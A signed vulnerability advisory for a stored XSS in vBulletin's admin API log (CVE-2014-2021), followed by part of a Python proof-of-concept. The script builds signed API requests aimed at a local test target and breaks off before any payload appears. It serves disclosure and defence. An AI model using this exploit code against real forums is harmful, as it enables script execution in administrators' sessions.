-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth) ============================================================================ ==================== Overview - -------- date : 10/12/2014 cvss : 4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) base cwe : 79 vendor : vBulletin Solutions product : vBulletin 4 versions affected : latest 4.x and 5.x (to date); verified <= 4.2.2 ; <= 5.0.x * vBulletin 5.0.5 (verified) * vBulletin 4.2.2 (verified) * vBulletin 4.2.1 (verified) * vBulletin 4.2.0 PL2 (verified) exploitability : * remotely exploitable * requires authentication (apikey) * requires non-default features to be enabled (API interface, API-Logging) * requires user interaction to trigger exploit (admincp - admin views logs) patch availability (to date) : None Abstract - --------- vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name) allowing the remote xmlrpc client to inject code into the xmlrpc API logging page. Code is executed once an admin visits the API log page and clicks on the API clients name. risk: rather low - due to the fact that you the api key is required you can probably use CVE-2014-2023 to obtain the api key Details - -------- vulnerable component: ./admincp/apilog.php?do=viewclient apilog.php does not sanitize xmlrpc client provided data before passing it to print_label_row to generate the output page. Proof of Concept (PoC) - ---------------------- see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021 1) prerequesites 1.1) enable API, generate API-key logon to AdminCP goto "vBulletin API"->"API-Key" and enable the API interface, generate key goto "vBulletin API"->"API-Log" and enable all API logging 2) run PoC edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL) run PoC, wait for SUCCESS! message 3) trigger exploit logon to AdminCP goto "vBulletin API"->"API-Log" and hit "view" in search results click on "client name" the injected msgbox pops up Timeline - -------- 2014-01-14: initial vendor contact - no reply 2014-01-24: vendor contact - no reply 2014-10-13: public disclosure Contact - -------- tintinweb - https://github.com/tintinweb/pub/cve-2013-2021 (0x721427D8) -----BEGIN PGP SIGNATURE----- iQIcBAEBAgAGBQJUPDfoAAoJEBgB43t1YjbLsu8P/1m8lGQGk8MwjsbpcHsEkfdD CPEivvYOUfQXQPas5iqTLmWGqJWFvpKm9pHX4+Iygq3ogeAO7cmefSEvltX55uuF 6LaikmhjYfJW1SutTKE375HGuBxRA2m1kuvBN2z2bY+yqDZXpKeO9Ho1YEYQJ79N Q6Urz8WWO41tUhEJ2APdB6BhXIulEBM7Xogy2qlFoKD4Z7vNCt7olNTpe7+gzJe2 cZTiLMLMxndgkfb2evORcX/a9EdAeDPYvgQrmzmeUllZ24CK4C+JM2iOsRLSaIqf uvbwv4ZKvtlX0LuAYTEk9N1gvDYnxEwHiv7+hsVYpSxHSLS+Nk77mir/LnZxsW9A pz36AmavGekvi1hr7QYMLB/b4+TREeKKjA0XAf6eZbwDeNgSXLY2ptvY8Li+oRHL qYPkwrDHm57FjG4LRgsYGBdzi7ALW1nRfBuh1KAbklavXSHitVsBJhREX/YsJ12g ycbGqxkP4keSTqb61EHtW8hU41riPT5+XxhWgQRVVJvc3t5rp8ztzzTrbhsyz7PW CQ5bTSR1rks0MRHaoEm9SrVvITIBrhGHpCplqWOKiEcSSHr0Q4RBxB8jr3n1eR1R Nzzpp//PUBQazScCa3zJOrCrfOCJjmKPUZwqRRyook1hJRWj0IzVLVqUEUCuHCj9 skeeueYa1iweiHwNgZdn =BO28 -----END PGP SIGNATURE----- _______________________________________________ PoC: #!/usr/bin/env python # -*- coding: utf-8 -*- ''' @author: tintinweb 0x721427D8 ''' import urllib2, cookielib, urllib, json, hashlib class Exploit(object): baseurl = None cookies = None def __init__(self,baseurl,params, debuglevel=1): self.cookies = cookielib.LWPCookieJar() handlers = [ urllib2.HTTPHandler(debuglevel=debuglevel), urllib2.HTTPSHandler(debuglevel=debuglevel), urllib2.HTTPCookieProcessor(self.cookies) ] self.browser = urllib2.build_opener(*handlers) self.baseurl=baseurl self.params = params def call(self,path="",data={}): assert(isinstance(data,dict)) data = urllib.urlencode(data) req = urllib2.Request("%s%s"%(self.baseurl,path),data) req.add_header("Content-Type", "application/x-www-form-urlencoded") return self.browser.open(req) def call_json(self,path=None,data={}): try: x=self.call(path,data).read() print "raw_response", x resp = json.loads(x) except urllib2.HTTPError, he: resp = he.read() return resp def vb_init_api(self): params = {'api_m':'api_init'} params.update(self.params) data = self.call_json("?%s"%(urllib.urlencode(params))) self.session = data return data def vb_call(self, params): api_sig = self._vb_build_api_sig(params) req_params = self._vb_build_regstring(api_sig) params.update(req_params) data = self.call_json("?%s"%(urllib.urlencode(params)),data=params) if not isinstance(data, dict): return data if 'errormessage' in data['response'].keys(): raise Exception(data) return data def _ksort(self, d): ret = [] for key, value in [(k,d[k]) for k in sorted(d.keys())]: ret.append( "%s=%s"%(key,value)) return "&".join(ret) def _ksort_urlencode(self, d): ret = [] for key, value in [(k,d[k]) for k in sorted(d.keys())]: ret.append( urllib.urlencode({key:value})) return "&".join(ret) def _vb_build_api_sig(self, params): apikey = self.params['apikey'] login_string = self._ksort_urlencode(params) access_token = str(self.session['apiaccesstoken']) client_id = str(self.session['apiclientid']) secret = str(self.session['secret']) return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest() def _vb_build_regstring(self, api_sig): params = { 'api_c':self.session['apiclientid'], 'api_s':self.session['apiaccesstoken'], 'api_sig':api_sig, 'api_v':self.session['apiversion'], } return params if __name__=="__main__": TARGET = "http://localhost:8008/sectest/vbulletin_5/api.php" APIKEY = "G4YvWVhp" DEBUGLEVEL = 0 # 1 to enable request tracking print "vBulletin 5.x / 4.x - XSS in API" ### 1. XSS ''' vbulletin: admincp => settings: options => vbulletin API and Mobile Application Options * enable vbulletin API = yes * enable API log = yes xss in: 1) http://xxxx/vb/admincp/apistats.php?do=client 2) click on hex